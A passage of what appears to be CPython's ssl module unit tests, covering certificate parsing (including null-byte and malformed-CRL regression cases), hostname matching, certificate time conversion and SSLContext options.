cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Aug 26 14:23:15 2028 GMT'))
self.assertEqual(p['notBefore'], asn1time('Aug 29 14:23:15 2018 GMT'))
self.assertEqual(p['serialNumber'], '98A7CF88C74A32ED')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with ssl.wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# A wildcard in the first fragment and IDNA A-labels in subsequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with ssl.wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0):
default |= ssl.OP_NO_COMPRESSION
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
